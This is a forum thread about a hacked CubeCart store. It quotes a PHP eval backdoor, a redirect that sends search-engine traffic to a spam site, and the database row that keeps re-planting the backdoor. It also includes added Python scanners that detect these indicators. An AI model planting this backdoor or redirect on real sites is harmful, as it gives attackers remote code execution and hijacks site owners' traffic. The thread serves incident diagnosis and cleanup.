
my Cubecart site hacked


jpayam


Hello,

I use the latest CubeCart. I see a PHP file (snippet_892d667b445c9ebb6888107b8124a8.php) in the /includes/extra directory which includes the code below:

<?php eval($_REQUEST["H6GrD"]);?>

This file is recreated automatically again and again after I delete it!!!

This code adds the code below to my index.php file.

if (preg_match("#(google|googlebot|slurp@inktomi|yahoo! slurp|msnbot)#si", $_SERVER['HTTP_USER_AGENT'])) {
header("HTTP/1.1 301 Moved Permanently");
header("Location: http://www.reehair.com/");
exit;
}

if (preg_match("#(www\.google)#si",$_SERVER['HTTP_REFERER'])) {
header("HTTP/1.1 301 Moved Permanently");
header("Location: http://www.reehair.com/");
exit;
}

 

Now I am losing my SEO links in search engines.

Thanks in advance for any help.

 


This is exactly the same as that other report and is something we have seen on quite a few sites over the last 7 to 10 days. There is absolutely no point in simply deleting the code or replacing the file without discovering and plugging the mechanism through which they are gaining access, as it is an automated system that looks for and inserts this code.

This has been found to be caused mostly by having old and insecure versions of other software installed within the same hosting account, such as a forum (phpBB) or CMS (WordPress and Joomla) - if you have any other software installed alongside your CubeCart software you MUST always keep this right up to date, as they have all had serious security issues disclosed and fixed over the recent months. Any software installed but not being used should be deleted and not just moved. It can also be caused by insecure hosting where access is gained through another account with a vulnerability, which is common with cheap shared hosting - if you value your CubeCart store then get decent hosting!

Ian


We use a VPS for this store. We do not have any other scripts, only one site with the latest CubeCart script.
The PHP version is the latest 5.4 with Suhosin enabled, and all dangerous PHP functions are disabled in the php.ini file.
CSF is active, and ModSecurity with the latest COMODO rules is active.
ClamAV and ConfigServer eXploit Scanner scans did not find any fingerprint matches.

 

ConfigServer eXploit Scanner only found a suspicious match:
'/home/XXXXXXXXXX/public_html/cache/75590.sql.1efdd7b03693b5f7a93ef2d228d5e98c.cache'
Regular expression match = [eval\(\$_REQUEST\[]

I emptied the cache folder and even disabled the cache temporarily, but the problem is still not fixed.

 


Yes, thanks.
The problem is from my database; it seems it was infected before I installed ModSecurity, as I installed a fresh CubeCart on another site and it works without problems, but when I import my database to the new site I see the problem again (the file snippet_892d667b445c9ebb6888107b8124a8.php in the /includes/extra directory).

How can I clean my database?

I want to keep the store settings, products, customers and orders.


The code below was in my database. I just cleaned it and it seems the problem is fixed.

-- Dumping data for table `CubeCart_code_snippet`
--

LOCK TABLES `CubeCart_code_snippet` WRITE;
/*!40000 ALTER TABLE `CubeCart_code_snippet` DISABLE KEYS */;
INSERT INTO `CubeCart_code_snippet` VALUES (1,1,'snippetH6GrD','Snippet','controller.index','<?php eval($_REQUEST[\"H6GrD\"]);?>','','',3);
/*!40000 ALTER TABLE `CubeCart_code_snippet` ENABLE KEYS */;
UNLOCK TABLES;

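Added example (not part of the original posts and not CubeCart code): a small Python scanner that reads a mysqldump file and flags any string value in an INSERT row that evaluates request-supplied PHP input, as the row quoted above does. It goes slightly beyond the scanner regex quoted in the thread by covering the other request superglobals; the sample dump is constructed and the function names are illustrative.

```python
import re

# Constructed sample shaped like the dump in the post, plus one benign row.
# Column meanings are not assumed; string values are scanned positionally.
SAMPLE_DUMP = r"""
LOCK TABLES `CubeCart_code_snippet` WRITE;
INSERT INTO `CubeCart_code_snippet` VALUES (1,1,'snippetH6GrD','Snippet','controller.index','<?php eval($_REQUEST[\"H6GrD\"]);?>','','',3),(2,1,'banner','It\'s a banner','controller.index','<?php echo \"hi\";?>','','',1);
UNLOCK TABLES;
"""

INSERT_RE = re.compile(r"^INSERT INTO `(?P<table>[^`]+)` VALUES (?P<body>.*);\s*$", re.M)
# PHP that evaluates request-supplied input (wider than the regex quoted in the thread).
SUSPICIOUS = re.compile(r"\b(?:eval|assert)\s*\(\s*\$_(?:REQUEST|POST|GET|COOKIE)\b", re.I)

def string_values(body):
    """Yield (row_index, decoded_string) for every quoted value in a VALUES body."""
    row, i, n = -1, 0, len(body)
    while i < n:
        if body[i] == "(":                 # a new row tuple starts
            row += 1
        elif body[i] == "'":               # opening quote of a string value
            i += 1
            out = []
            while i < n:
                if body[i] == "\\" and i + 1 < n:                 # backslash escape: keep next char
                    out.append(body[i + 1]); i += 2
                elif body[i] == "'" and body[i + 1:i + 2] == "'":  # doubled quote
                    out.append("'"); i += 2
                elif body[i] == "'":                               # closing quote
                    break
                else:
                    out.append(body[i]); i += 1
            yield row, "".join(out)
        i += 1

def scan_dump(text):
    """Return (table, row_index, value) for every suspicious string value in the dump."""
    findings = []
    for m in INSERT_RE.finditer(text):
        for row, value in string_values(m.group("body")):
            if SUSPICIOUS.search(value):
                findings.append((m.group("table"), row, value))
    return findings

if __name__ == "__main__":
    for table, row, value in scan_dump(SAMPLE_DUMP):
        print(f"{table}: row {row}: {value}")
```

Running it over a full dump before importing into a fresh install shows which table and row need cleaning, so store settings, products, customers and orders can be kept.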

On your database server, would you happen to have it set to log to a General Log?

I can understand if it's not. Without some highly disciplined routine maintenance (or a cron job) to rotate out the logs, it could get quite large.

If you do have a General Log for the database server, you may be able to tell exactly when this record was first inserted into the database, and examine all the nearby database activity. Then correlate the date/time to the site's web server access log.

There might even be an entry in CubeCart's Staff Access Log for that date/time.

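Added example (not part of the original posts): one way to do the access-log side of the correlation suggested above, in Python. It finds requests that touch the dropped file path or carry the backdoor parameter name reported in this thread, then lists everything the same client did within a time window of its first hit. The log lines, dates, IP addresses and the `/example-page.php` path are constructed, and the combined log format is an assumption.

```python
import re
from datetime import datetime, timedelta

# Constructed combined-format access log lines (documentation IP ranges, made-up times).
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2015:13:41:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2015:13:43:50 +0000] "POST /example-page.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2015:13:44:10 +0000] "POST /includes/extra/snippet_892d667b445c9ebb6888107b8124a8.php HTTP/1.1" 200 17 "-" "-"
203.0.113.9 - - [01/Jan/2015:15:02:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2015:13:44:30 +0000] "GET /index.php?H6GrD=x HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)')
# Indicators taken from the thread: the dropped file's location and the parameter name.
INDICATORS = re.compile(r"/includes/extra/snippet_[0-9a-f]+\.php|[?&]H6GrD=")

def parse(log_text):
    """Yield (timestamp, ip, method, url) for each line that parses."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
            yield ts, m.group("ip"), m.group("method"), m.group("url")

def activity_near_hits(log_text, window=timedelta(minutes=10)):
    """Map each client IP that touched an indicator to its requests near its first hit."""
    entries = sorted(parse(log_text))
    first_hit = {}
    for ts, ip, _method, url in entries:
        if INDICATORS.search(url) and ip not in first_hit:
            first_hit[ip] = ts
    return {
        ip: [(ts, method, url) for ts, eip, method, url in entries
             if eip == ip and abs(ts - hit) <= window]
        for ip, hit in first_hit.items()
    }

if __name__ == "__main__":
    for ip, requests in activity_near_hits(SAMPLE_LOG).items():
        for ts, method, url in requests:
            print(ip, ts.isoformat(), method, url)
```

`$_REQUEST` also reads POST and cookie data, which a standard access log does not record, so the file-path indicator matters as much as the parameter name. The timestamps it returns are the ones to compare against the database general log and the Staff Access Log.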

I do not have a log for MySQL on the server.

My site was hacked two times, and every time I see the System Errors Log entry below within the CubeCart panel.

Yesterday, 13:44 [Deprecated] /home/XXXXXXXXXXXXXXX/domains/XXXXXXXXXXX/public_html/includes/extra/snippet_892d667b445c9ebb6888107b8121a8.php(1) : eval()'d code(1) : eval()'d code:1 - Function set_magic_quotes_runtime() is deprecated

 

 
